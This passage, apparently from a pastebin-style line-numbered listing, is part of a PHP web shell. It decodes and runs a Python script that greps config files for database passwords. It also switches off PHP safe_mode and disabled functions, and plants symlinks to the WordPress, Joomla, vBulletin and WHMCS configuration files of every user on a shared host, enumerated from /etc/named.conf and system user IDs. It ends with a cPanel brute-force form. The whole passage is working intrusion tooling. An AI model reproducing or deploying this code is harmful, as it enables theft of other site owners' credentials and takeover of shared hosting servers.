V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
  1003. $file = fopen("cp.py","w+");
  1004. $write = fwrite ($file ,base64_decode($cp));
  1005. fclose($file);
  1006. chmod("cp.py",0755);
  1007. $url = $_POST['url'];
  1008. echo"<center>
  1009. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
  1010. system("python cp.py $url config");
  1011. unlink ('cp.py');
  1012. echo"</textarea>
  1013. </center>";
  1014. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  1015. exit;
  1016. }
  1017. if($_POST['matikan']=='sekatan'){
  1018. @error_reporting(0);
  1019. $phpini =
  1020. 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
  1021. $file = fopen("php.ini","w+");
  1022. $write = fwrite ($file ,base64_decode($phpini));
  1023. fclose($file);
  1024. $htaccess =
  1025. 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
  1026. $file = fopen(".htaccess","w+");
  1027. $write = fwrite ($file ,base64_decode($htaccess));
  1028. echo "<hr><center><b>DONE!";
  1029. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  1030. exit;
  1031. }
  1032. if($_POST['mendapatkan']=='passwd'){
  1033. @set_magic_quotes_runtime(0);
  1034. ob_start();
  1035. error_reporting(0);
  1036. @set_time_limit(0);
  1037. @ini_set('max_execution_time',0);
  1038. @ini_set('output_buffering',0);
  1039. $fn = $_POST['foldername'];
  1040. //all function here
  1041.  
  1042. function syml($usern,$pdomain)
  1043. {
  1044. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1045. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1046. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1047. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  1048. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1049. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1050. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1051. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1052. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1053. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1054. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1055. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1056. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1057. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1058. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1059. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1060. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1061. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1062. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1063. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1064. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1065. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  1066. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  1067. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  1068. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  1069. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  1070. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  1071. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  1072. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  1073. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  1074. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1075. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1076. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1077. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  1078. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1079. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1080. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1081. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1082. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1083. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1084. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1085. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1086. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1087. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1088. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1089. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1090. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1091. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1092. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1093. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1094. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1095. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  1096. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  1097. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  1098. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  1099. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  1100. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  1101. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  1102. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  1103. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  1104. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1105. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1106. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1107. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  1108. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1109. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1110. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1111. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1112. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1113. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1114. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1115. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1116. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1117. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1118. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1119. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1120. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1121. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1122. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1123. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1124. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1125. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  1126. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  1127. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  1128. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  1129. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  1130. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  1131. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  1132. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  1133. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  1134. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1135. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1136. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1137. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  1138. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1139. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1140. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1141. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1142. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1143. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1144. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1145. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1146. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1147. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1148. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1149. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1150. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1151. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1152. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1153. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1154. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1155. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  1156. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  1157. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  1158. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  1159. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  1160. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  1161. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  1162. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  1163. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  1164. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1165. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1166. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1167. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  1168. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1169. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1170. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1171. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1172. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1173. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1174. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1175. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1176. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1177. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1178. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1179. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1180. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1181. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1182. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1183. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1184. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1185. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  1186. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  1187. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  1188. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  1189. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  1190. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  1191. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  1192. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  1193. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  1194. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1195. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1196. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1197. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  1198. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1199. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1200. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1201. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1202. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1203. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1204. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1205. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1206. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1207. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1208. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1209. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1210. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1211. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1212. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1213. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1214. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1215. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  1216. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  1217. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  1218. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  1219. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  1220. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  1221. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  1222. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  1223. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  1224. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1225. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1226. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1227. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  1228. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1229. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1230. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1231. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1232. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1233. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1234. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1235. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1236. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1237. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1238. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1239. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1240. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1241. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1242. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1243. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1244. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1245. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  1246. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  1247. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  1248. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  1249. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  1250. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  1251. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  1252. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  1253. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  1254. }
  1255.  
  1256. $d0mains = @file("/etc/named.conf");
  1257.  
  1258. if($d0mains)
  1259. {
  1260. mkdir($fn);
  1261. chdir($fn);
  1262.  
  1263. foreach($d0mains as $d0main)
  1264. {
  1265. if(eregi("zone",$d0main))
  1266. {
  1267. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1268. flush();
  1269.  
  1270. if(strlen(trim($domains[1][0])) > 2)
  1271. {
  1272. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1273.  
  1274. syml($user['name'],$domains[1][0]);
  1275. }
  1276. }
  1277. }
  1278. echo "<center><font color=lime size=3>[ Done ]</font></center>";
  1279. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  1280. }
  1281. else
  1282. {
  1283. mkdir($fn);
  1284. chdir($fn);
  1285. $temp = "";
  1286. $val1 = 0;
  1287. $val2 = 1000;
  1288. for(;$val1 <= $val2;$val1++)
  1289. {
  1290. $uid = @posix_getpwuid($val1);
  1291. if ($uid)
  1292. $temp .= join(':',$uid)."\n";
  1293. }
  1294. echo '<br/>';
  1295. $temp = trim($temp);
  1296.  
  1297. $file5 = fopen("test.txt","w");
  1298. fputs($file5,$temp);
  1299. fclose($file5);
  1300.  
  1301. $htaccess =
  1302. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  1303. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  1304. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  1305. ';
  1306. $file = fopen(".htaccess","w+");
  1307. $write = fwrite ($file ,base64_decode($htaccess));
  1308.  
  1309. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  1310. while(!feof($file))
  1311. {
  1312. $s = fgets($file);
  1313. $matches = array();
  1314. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1315. $matches = str_replace("home/","",$matches[1]);
  1316. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1317. continue;
  1318. syml($matches,$matches);
  1319. }
  1320. fclose($file);
  1321. echo "</table>";
  1322. unlink("test.txt");
  1323. echo "<center><font color=lime size=3>[ Done ]</font></center>";
  1324. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  1325. }
  1326. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  1327. exit;
  1328. }
  1329. ?>
  1330. <form method="POST" target="_blank">
  1331. <strong>
  1332. <input name="page" type="hidden" value="find"><table>
  1333. </strong><br><br><center><font size="5" style="italic" color="#FFFFFF">=[ Cpanel BruteForce ]=</font></center><br><br>
  1334. <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  1335. <tr>
  1336. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  1337. <center><b><font size="5" style="italic" color="#FFFFFF">Cpanel BruteForce</font></b></center></td></tr>
  1338. <tr>
  1339. <td>
  1340. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  1341. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  1342. <strong>User :</strong></td>
  1343. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
  1344. </tr>
  1345. <tr>
  1346. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  1347. <strong>Pass :</strong></td>
  1348. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
  1349. </tr>
  1350. <tr>
  1351. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  1352. <strong>Type :</strong></td>
  1353. <td valign="top" bgcolor="#151515" colspan="5">
  1354. <span class="style2"><strong>Simple : </strong> </span>
  1355. <strong>
  1356. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  1357. <font class="style2"><strong>/etc/passwd : </strong> </font>
  1358. <strong>
  1359. <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  1360. </strong>
  1361. </span>
